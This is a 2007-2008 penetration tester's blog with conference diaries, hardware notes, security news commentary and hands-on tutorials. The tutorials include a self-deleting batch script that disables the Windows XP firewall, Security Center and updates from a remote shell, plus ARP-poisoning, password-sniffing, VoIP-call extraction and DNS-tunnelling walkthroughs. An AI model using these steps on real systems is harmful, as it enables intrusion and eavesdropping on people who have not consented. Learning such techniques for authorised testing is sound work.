As I type this Joe and Lawrence are sitting at the dining room table with laptops with evil1 still in his room sleeping. Overall shmoocon was a blast, the talks were o.k. but the people and side channel conversations we had were excellent.

Will I be going next year? Absolutely!

Shouts out to to CG, Kev, Marco and Steve A. I'll catch those who are going to BH Federal at the briefings next week or at DefCon later in the year. If not see you guys on SILC.

Shmoocon Day Two

2008-02-16T23:40:00.000-08:00

We were able to actually make it in on time today after getting 2 hours of sleep! Watched the Active 802.11 Fingerprinting: Gibberish and "Secret Handshakes" to Know Your AP by Sergey Bratus, Cory Cornelius and Daniel Peebles. I found this to be an interesting talk and hope that this research begins to delve into the client realm in the near future.

I also had the pleasure of catching the following talks:

Got Citrix? Hack It! By Shanit Gupta and Advanced Protocol Fuzzing - What We Learned when Bringing Layer2 Logic to "SPIKE Land" by Enno Rey and Daniel Mende. There was also an impromptu talk by muts covering AV circumvention using ollydebug and Windows Vista ASLR circumvention.

I had lunch with Kevin Figueora of K&T International Consulting, Marco Figueroa of MAF Consulting, Inc, Joe McCray of LearnSecurityOnline, Lawrence White of IGS and evil1 at the Chipotle down the street from the hotel. All of us also got together later in the evening and had the most amazing time eating dinner, watching the All-Star 3 point shooting and Slam Dunk contest and having drinks and talking shop. The talks at any convention are good to go to but these are the experiences that stay with you for a lifetime.

Shmoocon Day One

2008-02-16T04:44:00.001-08:00

Overslept like a bunch of jet lagged bums! Arrived 2 hours late and missed all of the talks getting social with my peers. Met some cool guys: muts from Offensive Security/Back|Track, Aaron Petersen from MRL (Midnight Research Labs) and Rick Farina from AirTight. As is usual for my con experiences hung out with the LSO (LearnSecurityOnline) j0e and Chris and evil1 (mad props for webapp kung fu).

Shmoocon Day Zero

2008-02-16T04:41:00.001-08:00

Law and I caught a red eye at 10pm out of SEA to BWI with a connecting flight through Detroit. One of the most uncomfortable experiences of my life. J0e picked us up from the airport and took us straight to the bar at 8:30am. Drove back to his place in Maryland, took a nap, took out got acquainted with local network and hacked around a little bit. Met Wolf, picked up evil1 from the Reagan airport in DC, went back to the bar (which caught on fire which is another story for another time), did some urban exploring (evil1 did), drove back to Maryland (j0e got a speeding ticket), and hacked until 5am.

Going to Shmoocon and Blackhat DC 2008

2007-12-01T17:22:00.000-08:00

Lawrence and I finally got our hands on some tickets to Shmoocon (Blackhat was locked up ages ago). We are really looking forward to hanging out with the guys from LearnSecurityOnline.com (Joe and Chris) and making some new friends and sharing ideas and techniques with others. I have personally never been to DC (does Beltsville count?) and look forward to the entire experience.

I have only heard great things about Shmoocon and eagerly look forward to attending!

Argus, Afterflow and NSMWiki

2007-11-16T07:16:00.000-08:00

This month's ISSA Journal has an interesting article by Russ McRee on NSM topics. The main topic is Argus, an excellent suite of tools for implementing distributed collection of network flow information and graphing the output using Afterglow. It also happens that he mentions NSMWiki, which is maintained for the Sguil project.

If you're not an ISSA member, you can read Russ' article here.

Post Exploitation Technique: Kill the Windows XP SP2 firewall

2007-11-09T08:06:00.000-08:00

This registry hack assumes that you already possess a remote shell and need to kill the firewall remotely (to spawn remote shells on certain egress ports). To use, save the code below into a batch file (ie down.bat) and run on the remote computer.

@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0

May Your Skill Prevail.

When Script Kiddies Attack!

2007-11-08T20:03:00.000-08:00

BlackHat Vegas 2007 and Defcon 15 Photos

2007-11-07T09:13:00.000-08:00

Yes, I know these events transpired ages ago. I wanted to post them here anyway in case anyone was interested in seeing why I will never have a future in photography!

View the photos here.

Home/Office Lab

2007-11-07T09:06:00.000-08:00

One of the major undertakings of this recent summer was to rebuild the IGS Lab and Research environment.

From rats nest to organization. The majority of equipment was moved off desks and tables onto a rack along with the introduction of actual cable and wiring management. Additional power was also added to deal with random (and frustrating) power losses.

View the transformation.

Incident Handling Resources

2007-10-30T07:45:00.000-07:00

Department of Energy Computer Forensic Labs First Responders Manual

http://www.mirrors.wiretapped.net/security/info/papers/forensics/DOE-CFL-FirstResponseManual.pdf

Department of Justice Computer Seizure Procedures

http://www.cybercrime.gov/s&smanual2002.htm

While reading "Incident Response" I came across references to the
DOE-CFL manual and after some Google searching found the DOJ offering.
Both good reads for those interested in proper procedure for
performing IH.

Thoughts?

Linux By Example

2007-10-30T01:07:00.000-07:00

http://linux.byexamples.com/

I stumbled across this in my Internet travels.
All I can say is WOW! I could get lost for days on a site like this
trying out all of the options and experimenting with the offerings.

Take a look and let me know what you think.

VoIP Server Impersonation Issues

2007-10-28T01:48:00.000-07:00

A friend and colleague of mine Sandro Gauci has just posted some interesting information on the blog for his SIP VoIP auditing tool suite Sipvicious:

http://sipvicious.org/blog/2007/10/server-impersonation-and-sip.html

While you there if you haven't given Sipvicious a look to assist you in your SIP VoIP auditing I urge you to do so.

EDIT:

You can also read more about the issue here.

Blackhat USA 2007 and Defcon XV Socials

2007-07-13T13:29:00.000-07:00

I will be in Las Vegas, NV from July 29th to August 5 to attend Blackhat USA 2007 and Defcon XV. If anyone would like to meet up during that time and swap a few war stories and lies over a cold refreshment feel free to contact me at awilliams [at] ironguard [dot] net.

I'm always up for meeting new people and sharing ideas. Hope to see some of you down there!

Apologies for absence

2007-07-13T13:24:00.000-07:00

I personally apologize for not posting since last month. Its been a very busy last couple of weeks reorganizing the lab (I will post pictures soon) and preparing for Blackhat USA 2007 and Defcon XV.

I will post some new content in the very near future.

Logitech 2.4 GHz Cordless Presenter

2007-06-22T17:16:00.001-07:00

Recently we have found ourselves in need of a cordless presenter. Details on the device itself can be found on Logitech's web site:

http://www.logitech.com/index.cfm/mice_pointers/presentation_remote/devices/175&cl=us,en

I have to say we have been pleased with this device. It functions out of the box with no drivers (yes, it works in Ubuntu linux, I haven't had an opportunity to test it in other operating systems), the USB connector can be stored inside the unit and comes with a neoprene carrying case.

It has worked flawlessly in MS Powerpoint and OpenOffice Impress. Overall I would recommend it if you want a cordless presenter that does not function as a mouse.

Olympus VN-2100PC and Windows Vista Ultimate

2007-06-22T16:41:00.000-07:00

It was high time to purchase these for the Incident Response team. According to the Olympus web site the device is Vista compatible:

http://www.olympus.co.jp/en/support/imsg/vtrek/compati/winvista.cfm#vn

Armed with this information I attempted to install the device allowing Vista to perform its automagical powers of detection and stup. Alas, to no avail. At this point I resorted to the installation CD that came with the device.

After running the installation and subsequently launching the executable it terminated immediately. Based off my previous dealings with Vista I simply allowed Vista to execute the program using Windows XP SP2 compatibility.

Voila! Instant access to the device and full functionality. As is true with all things there is more than one way to skin a cat. Olympus provides a patch to the software that provides Vista compatibility:

http://www.olympusamerica.com/files/DWPUP4EN.zip

As the device is used in the field I will keep folks updated with its pros and cons. If anyone else is using it or a similar device please leave a comment.

PayPal and two factor authentication

2007-06-21T20:33:00.000-07:00

Reading the article below really got me to thinking this morning. It sparked enough motivation for a blog post at least.

http://www.securityfocus.com/brief/528

I've always been an advocate for multi factor authentication. One of the main issues that I have with it is proper implementation. When I used to work for a major telecommunications carrier many of the staff in the IT department were issued credit card sized RSA devices to be used as secondary authentication when accessing the network via VPN. There were stringent rules as to where you could store it, that you couldn't loan it out or leave it lying about in plain view, etc.

On the other hand my girlfriend works for a local university in an accounting department. All of the employees in her department have RSA key fobs for usage as second factor authentication when logging in to the network. Well...while picking her up from work one evening I noticed that after she logged off she placed the key fob next to her keyboard. Being security conscious (picture that!) I asked “Aren't you going to lock that in your drawer or take it with you?”. She looked at me, smiled as if I were an idiot and matter of factly replied “Why would I do that? Everyone here leaves theirs on the desk when they leave.” Flabbergasted I walked to each workstation and checked, lo and behold at every workstation neatly placed to the left of the keyboard was an RSA key fob!

What does this story have to do with PayPal and the extra security measures they are attempting to employ? Everything. Two factor authentication doesn't do you much good if you don't take measures to ensure that the security it can provide you is not easily circumvented by poor security practices. When not in use do not leave it on your desk while you go to the restroom or leave for the day.

The following post below also shows that two factor authentication is not fool proof nor a panacea. You still need strong IT controls and policy in place.

http://neural-cybernetix.blogspot.com/2006/07/phishers-defeat-2-factor.html

On a side note I actually participated in the beta program and actually have one of the PayPal authentication devices. It was inexpensive, very painless to setup and works well. I keep it with me most of the time and when I don't I make certain that it is stored securely.

PQI Travel flash-Multi Slot Card R/W and Linux

2007-06-18T19:49:00.000-07:00

I have one of these and needed to access an SD card to retreive some information from it via Slackware Linux. The text below shows the steps I took to get this piece of hardware working correctly.

First make sure that the card reader was even being picked up:

igs-awilliams@IGS-LAP02:~> less /proc/scsi/usb-storage-0/1

Host scsi1: usb-storage
Vendor: Generic
Product: USB Storage Device
Serial Number: 0AEC305000001A002
Protocol: Transparent SCSI
Transport: Bulk
GUID: 0aec5010aec305000001a002
Attached: Yes

Thats present so I can proceed.

Under Linux these things are detected as SCSI devices do you have to
accommodate the multiple devices. Add the following to your lilo.conf:

append = "max_scsi_luns=6"

You will have to reboot after running lilo for the changes to take effect.

Now once you have rebooted you can check what drives your system has available:

igs-awilliams@IGS-LAP02:~> sudo fdisk -l

Disk /dev/sdc: 256 MB, 256901632 bytes
8 heads, 62 sectors/track, 1011 cylinders
Units = cylinders of 496 * 512 = 253952 bytes

This doesn't look like a partition table
Probably you selected the wrong device.

Device Boot Start End Blocks Id System
/dev/sdc1 ? 1568823 3870254 570754815+ 72 Unknown
Partition 1 has different physical/logical beginnings (non-Linux?):
phys=(357, 116, 40) logical=(1568822, 3, 11)
Partition 1 has different physical/logical endings:
phys=(357, 32, 45) logical=(3870253, 0, 51)
Partition 1 does not end on cylinder boundary.
/dev/sdc2 ? 340100 4243383 968014120 65 Novell Netware 386
Partition 2 has different physical/logical beginnings (non-Linux?):
phys=(288, 115, 43) logical=(340099, 6, 47)
Partition 2 has different physical/logical endings:
phys=(367, 114, 50) logical=(4243382, 4, 42)
Partition 2 does not end on cylinder boundary.
/dev/sdc3 ? 3769923 7673205 968014096 79 Unknown
Partition 3 has different physical/logical beginnings (non-Linux?):
phys=(366, 32, 33) logical=(3769922, 2, 30)
Partition 3 has different physical/logical endings:
phys=(357, 32, 43) logical=(7673204, 7, 39)
Partition 3 does not end on cylinder boundary.
/dev/sdc4 ? 5817906 5818018 27749+ d Unknown
Partition 4 has different physical/logical beginnings (non-Linux?):
phys=(372, 97, 50) logical=(5817905, 4, 25)
Partition 4 has different physical/logical endings:
phys=(0, 10, 0) logical=(5818017, 3, 33)
Partition 4 does not end on cylinder boundary.

Partition table entries are not in disk order
This disk has both DOS and BSD magic.
Give the 'b' command to go to BSD mode.

Disk /dev/hda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/hda1 * 1 2197 17647371 7 HPFS/NTFS
/dev/hda2 2198 5844 29294527+ 83 Linux
/dev/hda3 5845 5968 996030 82 Linux swap
/dev/hda4 5969 7296 10667160 83 Linux

Now its a matter of mounting the drive and verifying the contents:

igs-awilliams@IGS-LAP02:~> sudo mount -t vfat /dev/sdc4 /mnt/usbkey
igs-awilliams@IGS-LAP02:~> ls /mnt/usbkey
FileThatIWanted.exe
igs-awilliams@IGS-LAP02:~> df -h /mnt/usbkey
Filesystem Size Used Avail Use% Mounted on
/dev/sdc4 245M 28M 217M 12% /mnt/usbkey

There you have it. If anyone has a better solution please feel free to post a comment.

May Your Skill Prevail.

Safari Browser Bugs, Attack Surfaces, Oh My!

2007-06-18T19:42:00.000-07:00

Before anyone gets upset read the following, then if you have an opinion I would love to hear it.

http://www.darkreading.com/blog.asp?blog_sectionid=415

This is to be expected. I am not a Apple basher per say (Hey! I have an iPod nano that I love) but it is a matter of exposure to threats. Now that the source code for Safari has been exposed to a greater number of threats there will be more people poking and prodding at it and more vulnerabilities will be found. This is to be expected regardless of the platform or application.

In a semi-related blog post over at Taosecurity that I read yesterday it was put very well.

http://taosecurity.blogspot.com/2007/06/triple-boot-thinkpad-x60s.html

Richard Bejtlich says:

“Second, I am attending Black Hat this summer, and I don't trust Windows or Linux to that crowd. Sure, FreeBSD is "just as vulnerable" but the majority of the attackers will be looking for Windows and Linux users. Booting into FreeBSD and staying there will reduce my exposure surface.”

I totally agree with this statement. Even with the risk of sounding like a broken record I will reiterate that regardless of platform or application there are vulnerabilities that can . I too will be attending Black Hat and Defcon and will take extra measures from an OS and application perspective to maintain as small an exposure surface as possible.

Using voipong with Back|track 2 Final

2007-06-17T20:34:00.001-07:00

In a recent engagement we had the oppurtunity to capture VOIP traffic using tcpdump to save the output to a libpcap formatted file. After letting it run for a short time we saved the file and wanted to extract the contents and save them to a .WAV file available for playback. The following will show you how to install the latest release of voipong into Back|track Final, use tcpreplay to playback the libpcap formatted file as network traffic and subsequently listen to the resulting .WAV file.

First we must extract the voipong tarball:

bt ~ # tar -zxpvf voipong-2.0.tar.gz

Enter the voipong directory:

bt ~ # cd voipong-2.0

Prepare the proper Makefile for our platform:

bt voipong-2.0 # cp Makefile.linux Makefile

Issue the pair of commands to build and install voipong from source

bt voipong-2.0 # make

bt voipong-2.0 # make install

According to the INSTALL file we must also have sox installed to have voipong save files out to .WAV file from network traffic. Let's verify that sox is indeed present on our system:

bt voipong-2.0 # which sox
/usr/bin/sox
bt voipong-2.0 # which soxmix
/usr/bin/soxmix

Now we must edit the voipong.conf file to instruct it where to find sox and soxmix. In addition we must also change the entry as to what network adapter we will be using. The default is em0, in our case we will be changing this to ath0.

bt voipong-2.0 # nano /usr/local/etc/voipong/voipong.conf

Now we can execute voipong, I have used the -f switch to force it to the foreground without daemonizing so we can see the output in real time.

bt ~ # voipong -f
EnderUNIX VOIPONG Voice Over IP Sniffer starting...
Release 2.0, running on bt [Linux 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686]

(c) Murat Balaban http://www.enderunix.org/
15/06/07 04:32:33: EnderUNIX VOIPONG Voice Over IP Sniffer starting...
15/06/07 04:32:33: Release 2.0 running on bt [Linux 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686]. (c) Murat Balaban http://www.enderunix.org/ 8493]
15/06/07 04:32:33: Default matching algorithm: lfp
15/06/07 04:32:33: loadmodule: /usr/local/etc/voipong/modules/modvocoder_pcma.so (@0xb7f162a1)
15/06/07 04:32:33: loadmodule: /usr/local/etc/voipong/modules/modvocoder_pcmu.so (@0xb7f1427f)
15/06/07 04:32:33: loaded 2 module(s)
15/06/07 04:32:33: loadnetfile: fopen(/usr/local/etc/voipong/voipongnets): No such file or directory
15/06/07 04:32:33: ath0 has been opened in promisc mode. (10.1.1.0/255.255.255.0)

All looks well. Now its time to invoke tcpreplay so we can push our captured traffic back onto the network and view it with voipong. NOTE: voipong will capture this traffic in real time all on its own, I had to use the method because I had a capture file with VOIP traffic.

bt ~ # tcpreplay -i ath0 IGScallcapture.lpc
sending out ath0
processing file: IGScallcapture.lpc

15/06/07 04:36:11: [11222] VoIP call has been detected.
15/06/07 04:36:11: [11222] 10.0.0.145:49604 <--> 10.0.0.200:49606
15/06/07 04:36:11: [11222] Encoding 0-PCMU-8KHz, recording.......
15/06/07 04:38:33: [11222] maximum idle time [10 secs] has been elapsed for this call, the call might have been ended.
15/06/07 04:38:33: [11222] .WAV file output/20070615/session-enc0-PCMU-8KHz-10.0.0.145,49604-10.0.0.200,49606.wav has been created successfully
15/06/07 04:38:33: [11222] .WAV file output/20070615/session-enc0-PCMU-8KHz-10.0.0.200,49606-10.0.0.145,49604.wav has been created successfully
15/06/07 04:38:33: [11222] Mixed output files: output/20070615/session-enc0-PCMU-8KHz-10.0.0.145,49604-10.0.0.200,49606-mixed.wav
15/06/07 04:38:33: child [pid: 11222] terminated normally [exit code: 0]
15/06/07 04:43:39: SHUTDOWN signal caught, starting shutdown procedures...
15/06/07 04:43:39: PID 11039 [parent: 3047]: exited with code: 0. uptime: 7 minutes 42 seconds.

Everything looks great so far. Let's verify log output

bt log # cat /var/log/voipcdr.log
Start;End;Duration(seconds);Session Id;Party1 RTP Pair; Party 2 RTP Pair;Encoding;Rate
Fri Jun 15 04:36:11 2007;Fri Jun 15 04:38:23 2007;132;11222;10.0.0.145:49604;10.0.0.145:49606;0;8000

Once again, looks great. Lets check and see if our output files are in place.

bt output/20070615 # ls
session-enc0-PCMU-8KHz-10.0.0.145,49604-10.0.0.200,49606-mixed.wav session-enc0-PCMU-8KHz-10.0.0.200,49606-10.0.0.145,49604.wav
session-enc0-PCMU-8KHz-10.0.0.145,49604-10.0.0.200,49606.wav

Everything appears to be in order. Time for playback:

bt output/20070615 # play session-enc0-PCMU-8KHz-10.0.0.200,49606-10.0.0.145,49604.wav

Input Filename : session-enc0-PCMU-8KHz-10.0.0.200,49606-10.0.0.145,49604.wav
Sample Size : 16-bits
Sample Encoding: signed (2's complement)
Channels : 1
Sample Rate : 8000

Time: 00:48.89 [00:00.00] of 00:48.89 ( 100.0%) Output Buffer: 2.35M

Done.

Well...that's it in a nutshell. If you have any questions or feedback please feel free to drop me a comment.

May Your Skill Prevail.

Happy Fathers Day!

2007-06-17T20:29:00.000-07:00

I just wanted to give a shout out to the other Fathers out there and hope that you enjoyed your day. I know that I did, Korean BBQ and Marinated Chicken Drumettes off the grill with Arrogant Bastard Ale to wash it all down with. Not to mention the shiny Fossil watch and other presents and accolades.

Definitely a day to remember.

Getting Tcpreplay and 802.11 to Play Nice

2007-06-15T00:45:00.000-07:00

Sometimes you want to be able to replay traffic to analyze it live with different tools in your arsenal. This is not really an issue with standard Ethernet but can prove to be a bit challenging when faced with 802.11 traffic. Let's take a hands on look at what I'm talking about below.

So you captured some wifi data (802.11) with airodump-ng like this, for example:

igs-awilliams@IGSLAP02~> airmon-ng start wlan0

igs-awilliams@IGSLAP02~> airodump-ng -w dump -c 11 wlan0

(Or you captured with Kismet, etc.)

Now you want to go back and pull out passwords, URLs, instant messages and images from your capture file: dump.cap.

igs-awilliams@IGSLAP02~> dsniff -r dump.cap

dsniff: record_init: Invalid argument

And the other fun programs (driftnet, msgsnarf, urlsnarf, etc.) don't read files at all, they only work in real time listening on network interfaces. Driftnet won't even listen on 802.11 interfaces in rfmon mode:

igs-awilliams@IGSLAP02~> driftnet -i wlan0

driftnet: unknown data link type 119

The solution: Use tcpreplay to play back the packets on a network interface so all these interesting programs can work.

Download the latest stable release of tcpreplay (currently tcpreplay-2.3.5.tar.gz) here:

http://tcpreplay.synfin.net/trac/wiki/Download

Install from source in the usual fashion:

igs-awilliams@IGSLAP02~> tar xzvf tcpreplay-2.3.5.tar.gz

igs-awilliams@IGSLAP02~> cd tcpreplay-2.3.5

igs-awilliams@IGSLAP02~>tcpreplay-2.3.5 # ./configure

igs-awilliams@IGSLAP02~>tcpreplay-2.3.5 # make

igs-awilliams@IGSLAP02~>tcpreplay-2.3.5 # make install

Another small problem, tcpreplay doesn't understand 802.11 headers:

igs-awilliams@IGSLAP02~> tcpreplay -i lo dump.cap

sending on: lo

validate_l2(): Unsupported datalink type: 802.11 (0x69)

Relax, airdecap-ng can convert the capture to straight Ethernet. Normally you use this program to decrypt encrypted 802.11 data, but you can also use it just to strip the 802.11 headers:

igs-awilliams@IGSLAP02~> airdecap-ng dump.cap

Total number of packets read 256828

Total number of WEP data packets 315

Total number of WPA data packets 0

Number of plaintext data packets 42287

Number of decrypted WEP packets 0

Number of decrypted WPA packets 0

This creates a file named dump-dec.cap. If you need to decrypt the data as well, just include the necessary parameters (for example -e and -w) in the airdecap-ng command.

Now we're going to replay the data on the local loopback Ethernet interface (lo). This gives us an interface to send the data on without actually sending it out over the air or on the local network.

First start your programs to listen on the local interface (in different sessions of course, so you can see the output of each):

igs-awilliams@IGSLAP02~> dsniff -i lo

igs-awilliams@IGSLAP02~> driftnet -i lo

igs-awilliams@IGSLAP02~> urlsnarf -i lo

igs-awilliams@IGSLAP02~> msgsnarf -i lo

Then run tcpreplay (the -R option speeds up the replay):

igs-awilliams@IGSLAP02~> tcpreplay -i lo -R dump-dec.cap

sending on: lo

42287 packets (20751892 bytes) sent in 4.67 seconds

4435909.0 bytes/sec 33.84 megabits/sec 9039 packets/sec

Each sniffer sees the packets as they are replayed on the local interface.

May Your Skill Prevail!

Choicepoint pays...but who benefits?

2007-06-14T21:56:00.000-07:00

After this debacle it appears that it will culminate in what constitutes as a pass in the enterprise universe. For more details I refer you to the link to the article below and some of my commentary on the matter.

http://security.blogs.techtarget.com/2007/06/01/choicepoint-to-pay-500000-to-settle-with-43-states-and-dc/

An interesting resolution to an obvious lack of IT controls and governance. Furthermore the settlements and fine allocation is interesting. Why is the FTC receiving $10 million while the states are receiving $500,000 total? What ever happened to the actual customers whose information was carelessly handled? A $5 million dollar redress last year? That's it? Where is the accountability? Without it there is little incentive to improve security when the punishment for inappropriate conduct constitutes a slap on the wrist.

What are your thoughts?

How to use Webspy from the dsniff suite

2007-06-14T21:39:00.000-07:00

Webspy is an interesting tool from the dsniff family of tools including dsniff (password sniffer), arpspoof (ARP poisoning tool), dnsspoof (DNS spoofing tool), msgsnarf (view messages from IM clients), mailsnarf (view email messages), tcpkill (kill tcp connections on a local LAN), tcpnice (force other connections to "play nice" with their tcp connections) and webspy (view a targets web browsing in real time). When properly setup it will intercept web browsing requests from the victim and display them in the attackers web browser in real time. This post will show you how to run webspy successfully. I am assuming a basic knowledge of the Unix command shell in addition to reading the entire man pages for all of the applications listed in this write up.

You will need the following tools to successfully use webspy:

Tested using Ubuntu 7.04 and Slackware 11.

An ARP spoofing application, either arpspoof or ettercap will do.

fragrouter or echo 1 > /proc/sys/net/ipv4/ip_forward

Webspy

Web browser (Firefox 2.0.0.4 was used)

The first step is to successfully arp poison the target as well as the gateway for the local subnet. This can be accomplished via the use of one of two tools. The venerable arpspoof or the more recent ettercap (which contains its own plugin that allows for remote browsing but is outside the scope of this example). I will show both for completeness.

# arpspoof -i interface -t gatewayIP victimIP

# arpspoof -i interface -t victimIP gatewayIP

Open these in two separate shells and run them independently of one another. If you receive a "arpspoof: couldn't arp for host 10.1.1.1" or similar error please visit the Troubleshooting section at the end of this document.

To accomplish the same effect using ettercap as your ARP poisoner of choice:

# ettercap -i interface -Tq -M arp:remote /gatewayIP/ /victimIP/

At this stage you will need to open another shell and ensure that you are passing your stolen packets back onto the network. As is normal for most things there is more than one way to accomplish this goal. You will need to open another shell to execute these commands.

fragrouter -B1

If you do not have fragrouter or for some reason wish to pursue an alternate method of achieving the same goal you can use the following from the command line:

# echo 1 > /proc/sys/net/ipv4/ip_forward

You will need to open another shell/console to execute webspy:

# webspy -i interface victimIP

Well we are almost there! You will need to start one more shell and start up your browser from the command line (starting the browser via other methods did not function correctly for me).

# mozilla &

At this point if you have followed the directions correctly your broswer will start and any sites visited by the victimIP will appear in your browser in real time.

Troubleshooting:

Every time I attempt to execute arpspoof I get the following error: arpspoof: couldn't arp for host 10.1.1.1. I have tried various command line switches and nothing appears to work.

I received this error on my Slackware 11 installation which was compiled from source as opposed to using a package manager. The function arp_cache_lookup does not use the correct interface when running under Linux .. it always uses interface "eth0".. Don't fret, we can change this without too much effort. Change directory to where you unpacked dsniff to, you will want to find the file arp.c and edit a single parameter within it. Using your favorite editor open arp.c and change the following:

strncpy(ar.arp_dev, "eth0", sizeof(ar.arp_dev));

strncpy(ar.arp_dev, "wlan0", sizeof(ar.arp_dev));

Save the file and recompile the application.

If you have other issues, you got it running properly or you just want to drop a line feel free to leave a comment.

May Your Skill Prevail.

Due diligence?

2007-06-14T21:24:00.000-07:00

I have been reading the story referenced below and felt compelled to offer up yet another opinion on the matter:

http://www.securityfocus.com/news/11469?ref=rss

It would seem that when a persons private and professional reputation are at stake a forensic investigation would strive to perform due diligence in regards to their investigative techniques including reporting. I would think that this would cut down on “erroneous” forensic testimony.

For more details on the situations past and present please read the following blog posts:

http://blog.wired.com/27bstroke6/2007/06/teacher_granted.html

http://blog.washingtonpost.com/securityfix/2007/06/substitute_teacher_granted_new.html

I just don't even know where to begin here. Suppressed evidence from the defense's technical witness? Failure of the local Teacher's Union to step forward and do the right thing? The judge who criticized bloggers for trying to “improperly influence the court”? This case is a very strong example of how much ignorance still exists concerning computers, malware, strong information security policies, proper training, etc.

iodine and pingtunnel

2007-06-09T16:41:00.000-07:00

Well I tried to go to bed last night at a decent time...guess it just
didn't work out.

In any case I decided to experiment with some tunneling tools. I'm
very interested in being able to tunnel traffic along covert channels
especially for testing/auditing purposes for a client.

That being said I did a little searching around and found the two
tools listed in the subject of the blog. I tried pingtunnel first
but couldn't get it to function in my test environment. I sent an
information packed email to the softwares author and hope to hear
something in a timely fashion. In the interim I decided that I would
give iodine a shot and see what I could get to work. My preliminary
findings are below:

Start the server:

-(igs-awilliams@IGS-DEV01:ttyp5)-(11 files:26k@iodine)-(0 jobs)-(19:36)-
-(~/iodine:$)-> sudo /usr/local/sbin/iodined -f 172.16.0.1 test.asdf
Enter password on stdin:

Opened /dev/tun0
Setting IP of tun0 to 172.16.0.1
Adding route 172.16.0.1/24 to 172.16.0.1
add net 172.16.0.1/24: gateway 172.16.0.1
Setting MTU of tun0 to 1024
Opened UDP socket
Listening to dns for domain test.asdf

Verfiy that the tun/tap interface is enabled:

tun0: flags=51 mtu 1024
groups: tun
inet 172.16.0.1 --> 172.16.0.1 netmask 0xffffff00

Ok...so far so good. Now lets setup the client:

igs-awilliams@IGS-LAP02:~> sudo /usr/local/sbin/iodine -f 10.1.1.36 test.asdf
Enter password on stdin:

Opened dns0
Opened UDP socket
Version ok, both running 0x00000400. You are user #0
Setting IP of dns0 to 172.16.0.2
Setting MTU of dns0 to 1024
Sending queries for test.asdf to 10.1.1.36

The tun/tap interface was aptly named dns0 so lets check that its
been created correctly:

dns0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:172.16.0.2 P-t-P:172.16.0.2 Mask:255.255.255.0
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1024 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
RX bytes:0 (0.0 b) TX bytes:2153 (2.1 Kb)

If all this works correctly I should be able to ping 172.16.0.1 from
172.16.0.2 right?

igs-awilliams@IGS-LAP02:~> ping 172.16.0.1
PING 172.16.0.1 (172.16.0.1) 56(84) bytes of data.
64 bytes from 172.16.0.1: icmp_seq=1 ttl=255 time=18.1 ms
64 bytes from 172.16.0.1: icmp_seq=2 ttl=255 time=17.2 ms
64 bytes from 172.16.0.1: icmp_seq=3 ttl=255 time=17.3 ms
64 bytes from 172.16.0.1: icmp_seq=4 ttl=255 time=17.3 ms
64 bytes from 172.16.0.1: icmp_seq=5 ttl=255 time=17.4 ms

--- 172.16.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4040ms
rtt min/avg/max/mdev = 17.201/17.491/18.108/0.339 ms

Voila!

NOTE: Usage of iodine makes use of the tun/tap driver of *nix
platforms. Windows users need not apply. The driver installs
standard on OpenBSD (the server in the example above) and requires a
kernel adjustment and compile on Linux (the client in the example).
For a list of supported OSes and platforms consult the following:

http://dev.kryo.se/iodine/wiki/SupportedPlatforms

May Your Skill Prevail.

Precedent case for illegal wifi usage

2007-06-09T16:37:00.000-07:00

I had to read the article below several times to try and wrap my mind around exactly what was taking place and the ramifications this would have.

http://www.foxnews.com/story/0,2933,276720,00.html

In my opinion a definite gray area in many ways. It seems as if some sort of warning would be available that a breach of policy has occurred or that for enforcement of this law to be conditional that when a proprietor advertises free wireless it include a notification that it is for paying customers only.

On the other hand one shouldn't connect to wireless access points without obtaining permission in advance. In addition, it would seem that a prosecutors office would have more pressing cases to pursue than something like this other than cases that “fall into their lap”. It would seem like enforcement of this law would be analogous to personal assault laws insofar that the victim (the coffee ship in this scenario) would need to press charges against defendant for the case to proceed forward.

What are your thoughts?

Backtrack 2 and the Alfa Network AWUS036H

2007-06-08T00:22:00.001-07:00

One of the new features of Backtrack 2 is support for the Alfa Network AWUS036H. This 802.11 wireless USB adapter sports power output of 500mW as is based off the Realtek 8187 chipset and uses the corresponding drivers. Some of the highlights of this hardware in addition to its exceptional power levels are its Apple support and ability to be used in Backtrack via virtual machine software such as VMWare 6 (There are many reported issues with using VMWare 5 with this hardware).

If you have this adapter with Backtrack 2 using the default drivers provided with the distribution you have probably noticed lackluster connectivity and reliability. This has been drastically improved with user released modules for Backtrack. These modules not only address the shortcomings of the default drivers but also provide an upgrade path to the latest release of the famed aircrack-ng software including support for aircrack-ptw.

The latest version of these drivers can be found via the Backtrack 2 Community Forums:

http://forums.remote-exploit.org/showthread.php?t=6784&highlight=alfa+modules

Once you have obtained the modules in question the subsequent installation is straightforward and painless. Documentation for the install is provided within the .zip archive. Reading of the above mentioned forum thread is also highly recommended especially if you haven't previously installed modules under Backtrack 2.

Once you have the modules installed you will need to unload the previous ones and load the new ones with using the following syntax:

igs-awilliams@igs-lap01# ifconfig wlan0 down
igs-awilliams@igs-lap01# rmmod r8187 && modprobe r8187

